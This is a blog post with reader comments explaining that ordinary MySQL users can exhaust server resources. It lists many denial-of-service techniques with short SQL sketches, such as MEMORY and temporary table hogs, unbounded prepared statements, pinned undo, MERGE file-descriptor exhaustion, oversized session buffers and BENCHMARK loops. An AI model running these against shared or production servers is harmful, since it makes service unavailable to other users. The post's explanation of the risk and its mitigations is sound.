People sometimes contact me about bugs like this, which give a user with basic privileges a trivial way to crash MySQL, and ask me what to do.

My answer to them is – there is nothing new here, and they should just sit back and relax 🙂

Really – there are many ways to crash or otherwise make the server unavailable with any MySQL version if you have access to it with normal privileges. We are constantly helping people fix mistakes in their applications which make MySQL Server useless (though few of them cause crashes, to be honest), so obviously it is even easier if you have intent.

In my opinion, MySQL security should be treated the following way – if you do not allow any access to MySQL Server, you are reasonably secure. There have been a few attacks which did not require a valid MySQL account, and these have normally been fixed by MySQL very quickly. The moment you give someone access to MySQL Server, however, all MySQL security can guarantee is that you can stop them from seeing (or changing) data you do not want them to touch; nothing ensures you can stop them from taking the server down.

This will not really change until MySQL Server implements Global Resource Management, as otherwise you can't really control how many resources a user can take.

You would say a resource hog is not a crash? Indeed, but it can still make the server unavailable, and in many cases you can use resource overload to make MySQL consume so much memory that it swaps badly until it runs out of space and gets killed. On 32-bit systems it was even easier: all you had to do was get enough memory allocated to reach the address space limit, and MySQL would crash when one of its internal memory allocations unexpectedly failed.

To give you a couple of hints:

Temporary Tables – You can build a query (with derived tables) which uses as many temporary tables as you like, and you can size them so they are still created in memory.
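To illustrate, a minimal sketch (table t and its size are hypothetical): each derived table is materialized separately, so the per-query memory multiplies.

SELECT COUNT(*)
FROM (SELECT * FROM t) AS d1,
     (SELECT * FROM t) AS d2,
     (SELECT * FROM t) AS d3;
-- keep adding derived tables; size t so each materialized copy stays
-- under tmp_table_size/max_heap_table_size and is held in memory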

Memory Tables – If you can create MEMORY tables you can create any number of them, and even though max_heap_table_size restricts the size of each table, the total size is unrestricted. Note you can create the tables as TEMPORARY so they are not easily visible on the file system.
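A hedged sketch of the idea (table and row-source names are made up):

SET SESSION max_heap_table_size = 16777216;  -- each table capped at 16MB
CREATE TEMPORARY TABLE hog1 (pad CHAR(255)) ENGINE=MEMORY;
INSERT INTO hog1 SELECT REPEAT('x', 255) FROM some_big_table LIMIT 60000;
-- repeat with hog2, hog3, ... each table honors the per-table cap,
-- but the total across tables is unbounded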

MyISAM Sort Buffer – This one is typically set large, as it is assumed only a couple of tables will be repaired at the same time. What if a user uses all 100 of his allowed connections to ALTER 100 different tables? This can be offset by keeping myisam_sort_buffer_size low, but then performance suffers.
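For instance (table names hypothetical), each of these run concurrently from its own connection can allocate its own sort buffer:

-- connection 1:
REPAIR TABLE myisam_table_01;
-- connection 2, at the same time:
REPAIR TABLE myisam_table_02;
-- ...up to the connection limit; each repair may allocate up to
-- myisam_sort_buffer_size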

Prepared Statements Number – Happily there is now a limit on the total number of prepared statements per server (max_prepared_stmt_count), so things are better than before, when an application which forgot to close prepared statements could easily make the server take up all memory. However, there is no per-user limit, so one user can consume all the prepared statements, breaking other applications which need them. Moreover, not all prepared statements consume the same amount of memory: by preparing complex statements you can eat a lot of memory. The workaround for this issue is to avoid the use of prepared statements and keep max_prepared_stmt_count very low.
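A sketch of the per-user gap (the statement text is arbitrary):

PREPARE s1 FROM 'SELECT 1';
PREPARE s2 FROM 'SELECT 1';
-- ...loop with new names until the server-wide limit is reached;
-- from then on every other account gets an error when it tries to
-- prepare a statement, since the limit is global, not per user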

Prepared Statements and Blob Data – If you want a lot of memory consumed by a single prepared statement, you can create a statement with thousands of placeholders and send data for each of them using the mysql_stmt_send_long_data call – the server buffers such data until you execute the prepared statement.

InnoDB Table Cache Leak – InnoDB never shrinks its internal table cache (data dictionary), so by creating and accessing a large number of InnoDB tables you can allocate a large amount of memory on the server. The size is typically 4-8K per table, though complex tables can require more, so this is mainly a problem for smaller servers.
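A sketch (table names are made up); the point is that the dictionary entry created on first access is never freed:

CREATE TABLE dict_hog_000001 (id INT PRIMARY KEY) ENGINE=InnoDB;
SELECT * FROM dict_hog_000001;  -- first access loads a dictionary entry
-- repeat for dict_hog_000002, dict_hog_000003, ... at roughly 4-8K
-- per table the dictionary grows and is never shrunk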

Table Cache Merge Tables – The table cache is allocated in entries, and it is normally assumed each entry will use no more than a couple of file descriptors. This is not the case with MERGE tables, for example – creating and accessing a few merge tables with 1000 subtables each will likely cause your MySQL server to run out of file descriptors. The same is true for partitioned tables in MySQL 5.1.
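Roughly like this (the underlying MyISAM tables t0001 through t1000 are assumed to already exist with identical structure):

CREATE TABLE big_merge (id INT NOT NULL) ENGINE=MERGE
  UNION=(t0001, t0002 /* ...through t1000 */);
SELECT COUNT(*) FROM big_merge;
-- opening the merge table opens every underlying table, so one
-- table cache entry can consume on the order of 1000 descriptors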

Disk Space – Hosting providers used to use disk quotas for MyISAM tables, and you can use a similar technique with innodb_file_per_table. However, you can't control the growth of the InnoDB system tablespace, which holds undo data and which you can grow through the roof by opening a transaction and doing a lot of updates, or simply by keeping a transaction open while allowing other users to do updates – InnoDB can only purge data after the oldest transaction needing the snapshot commits. You can partially work around this issue by killing transactions which are too old, though the proper solution would be some form of limit on undo segment size. Another possibility is to run queries which use large temporary tables or sort files, which can take up all disk space; even if these are placed on a separate partition, filling it up will leave other users unable to run their queries.
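A hedged sketch of the undo-pinning case (table t is hypothetical):

-- session 1: open a transaction, establish a read view, go idle
START TRANSACTION WITH CONSISTENT SNAPSHOT;
SELECT * FROM t LIMIT 1;
-- ...never commit

-- session 2 and others: generate undo that cannot be purged
UPDATE t SET val = val + 1;  -- repeat; the system tablespace grows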

Stored Procedures – How much memory can a stored procedure allocate? Say, can you create 1000 variables in a stored procedure and assign a 1MB value to each of them? I have not experimented with other stored procedure language constructs, but I do not think a tight memory allocation policy is enforced.
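Something along these lines (a hypothetical procedure; the full 1000-variable version and DELIMITER handling are elided):

CREATE PROCEDURE var_hog()
BEGIN
  DECLARE v1 LONGTEXT;
  DECLARE v2 LONGTEXT;
  -- ...up to v1000
  SET v1 = REPEAT('x', 1048576);  -- ~1MB each, if max_allowed_packet permits
  SET v2 = REPEAT('x', 1048576);
END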

Stored Procedures Cursors – Cursors inside stored procedures are implemented as temporary tables, so by opening a large number of cursors which are handled as in-memory temporary tables you can consume an unbounded amount of memory.
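A fragment from inside a hypothetical procedure body (query and table are made up):

DECLARE c1 CURSOR FOR SELECT * FROM t;
DECLARE c2 CURSOR FOR SELECT * FROM t;
-- ...more declarations
OPEN c1;
OPEN c2;
-- each OPEN materializes its result as a temporary table;
-- never CLOSE them and the memory stays allocated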

Stored Procedures Recursion – It does not have to be recursion per se, just different stored procedures calling each other. Calls require memory allocations, especially stack allocations. There are some protections to ensure you do not run out of stack, but they might not cover all cases.

Server Side Variables – Each server-side variable can hold a value up to max_allowed_packet in size (1M by default), but there does not seem to be any limit on the number of server-side variables one can create.
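Sketch (variable names arbitrary):

SET @v1 = REPEAT('a', 1048576);  -- up to max_allowed_packet per variable
SET @v2 = REPEAT('a', 1048576);
-- ...@v3, @v4 and so on; there appears to be no cap on the count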

Parse Tree – The query is internally represented by a parse tree inside MySQL, whose size of course depends on the query size, which is controlled by max_allowed_packet. However, some MySQL optimizations, such as equality propagation and range expansion, can cause the parse tree to blow up in size. The most trivial case was fixed, though I'm not sure all possibilities were validated.
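A sketch of the kind of query that can inflate internally (tables and columns hypothetical):

SELECT * FROM t1, t2, t3, t4
WHERE t1.a = t2.a AND t2.a = t3.a AND t3.a = t4.a
  AND t1.a IN (1, 2, 3 /* ...thousands of constants... */);
-- equality propagation can copy the IN-list condition to every
-- joined table, multiplying the internal representation size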

Session Variables – There is no restriction on how large an unprivileged user can set per-connection variables, which allows running queries with uncontrolled resource usage.
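For example (assuming the defaults allow an ordinary user to set these, as they did at the time; table and column are hypothetical):

SET SESSION sort_buffer_size = 1073741824;      -- 1GB for a single sort
SET SESSION read_rnd_buffer_size = 1073741824;
SELECT * FROM t ORDER BY unindexed_col;          -- sort claims the huge buffers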

Host Block – You can get a given client host blocked from accessing the server by simulating a number of failed connections. This can be avoided by setting the max_connect_errors variable high, but that obviously disables password brute force protection.

Mutex Saturation – Both InnoDB and MyISAM have hotspots, and with a few connections heavily exercising the right operations you can degrade system performance to the point of being non-functional.

General Overload – As MySQL does not have much resource utilization control, you can simply run heavy queries to leave MySQL Server barely functional. The limits which exist are not really helpful, as they do not define the query complexity and resource consumption allowed for a user. Heavy disk IO queries can be among the worst, because they both overload the IO system and wipe out both MySQL and OS caches, which can cause other users' queries to perform an order of magnitude slower than in the normal case.
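Even the most naive version works (a commenter below mentions the same trick):

SELECT BENCHMARK(100000000, SHA1('payload'));  -- pure CPU burn
-- a handful of these in parallel, or any large filesort or IO-bound
-- query, and everyone else's latency climbs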

Some of these come from real experiences; others are just my guesses of what could break things.

As you can see from these points, it does not look like MySQL tries to make the server bulletproof against somebody intentionally breaking it – most of the limits, such as max_heap_table_size or max_prepared_stmt_count, are designed to protect from typical application mistakes, not from someone intentionally trying to bring MySQL Server down.

Note: I explored only some of the server-side objects – generally one would need to ensure for each and every object that there are global quotas so it cannot consume too much memory, and also that a single user or single connection cannot consume all of it.

P.S. You might ask how all this can be true when there are thousands of virtual hosting companies offering MySQL access. Sure there are, and many of them are lucky to have users who use MySQL lightly and do not try to crash or take it over. Others constantly have to detect and restrict abusers. This is not to mention that many virtual hosting companies use old MySQL versions, which typically have more issues.

P.P.S.
Nothing I write here is a security hole unknown to the MySQL Team. What I'm trying to do is explain the issue so there are no misunderstandings about how secure MySQL is.

16 Comments
Roland Bouman

Hi Peter,

great post, thanks!

I was wondering though what is meant by:

Server Side Variables
vs
Session variables

I think by “Server Side Variables” you mean “User-defined variables” like

SELECT @myvar:='myvalue';

and by “Session variables” you mean a user can do

SET @@session.some_resource_limiting_var := extremely_high_number

?

Piotr Gasidło

I wonder if MySQL Proxy (http://forge.mysql.com/wiki/MySQL_Proxy) could be used to “filter” bad queries. We have a huge database mainly used by freehost users, and yesterday someone tried (and successfully managed) to exploit bug #32125 just as it was written in its bug report. This cost us 1.5 hours of MySQL unavailability (the exploit was run 3 times; after that MySQL took 30 minutes to start up – we have a really HUGE MySQL instance). I wonder if full disclosure of critical bugs should even be posted publicly on bugs.mysql.com before the bug is fixed and a patch is publicly available.

Jeremy Cole

Hi Peter,

Pretty good list.

Re. “Host block”, max_connect_errors does not come into play with failed password attempts. As far as I know, MySQL does not have protection against brute force password attempts. The max_connect_errors setting is only taken into account for failed handshakes and network problems.

Check the places that call inc_host_errors – there aren’t many (all in sql_parse.cc) – and it’s always called as:

inc_host_errors(&thd->remote.sin_addr);
return(ER_HANDSHAKE_ERROR);

Regards,

Jeremy

AlexN

Basically there are two types of “crashing the system”. The first type is something clearly stupid or malicious – like creating 10000 variables, loading gigabyte BLOBs, etc. These problems exist almost everywhere, and nobody in his right mind would try to implement them. The other type is doing something that looks harmless and results in a crashed system. The second type is more important.

Jeremy Cole

Hi Peter,

Yes, it’s strange. Aborted_connects has no relation to max_connect_errors. The only place it’s ever checked is in sql/sql_parse.cc:

848   if (!(specialflag & SPECIAL_NO_RESOLVE))
849   {
          ...
861     if (connect_errors > max_connect_errors)
862       return(ER_HOST_IS_BLOCKED);
863   }

Where connect_errors comes from:

851 thd->main_security_ctx.host=
852 ip_to_hostname(&thd->remote.sin_addr, &connect_errors);

There are a couple of things to consider with this:
* Since inc_host_errors is never called on password failure, bad password attempts don’t count.
* If you use skip_name_resolve, none of that code is called at all.
* If a host doesn’t have a valid PTR (ip to host mapping), nothing is ever counted.

As you probably know, I’ve been trying to get MySQL to overhaul how it handles hosts for a long time now. My host cache patches are a good start to this:

http://jcole.us/patches/mysql/5.0/host_cache/

Regards,

Jeremy

Jeremy Cole

Actually, to add one further bullet point:

* localhost doesn’t count either, as it’s not really looked up and thus doesn’t have an entry in hostname_cache to keep count of errors.

Gleb Pakharenko

There is the famous BENCHMARK() to DoS web sites 🙂

gigiduru

Given this statement: “Really – there are many ways to crash or otherwise make the server unavailable with any MySQL version if you have access to it with normal privileges”, shouldn’t the title be something like “10+ Ways to Keep MySQL Alive”?

Not to mention, this blog entry would be even shorter than it actually is right now.

Sandeep N Shelke

Peter,
I’m trying to send LONGTEXT data of 1GB using a prepared statement like:

INSERT INTO test(long_text) VALUES (?);

while (chunk_cnt < 535000)
{
    mysql_stmt_send_long_data(stmt, 0, chunk, 2000);
    chunk_cnt++;
}

mysql_stmt_execute(stmt);

The above code never finishes execution. After debugging and timing mysql_stmt_send_long_data(), I found that this function initially takes 0 microseconds but grows up to 375,000 microseconds for some chunks.

Can you provide any help in this case?

Thanks,

Joshua Perina

I believe I am encountering the Innodb Table Cache Leak problem. Is it possible to release this memory in some way? Will FLUSH TABLES release this memory?

Sudhakar

Hello Peter,
Thanks for the post!!!
My application is often facing crashed tables, and I run the REPAIR TABLE ‘table_name’ command every time.
Please help me understand the following scenarios:

1) Should I migrate from MySQL to another SQL server, or is there no need to migrate?
2) Will the crashing tables lead to big problems in the future? I need to take a decision quickly as my data is growing day by day.

Thanks,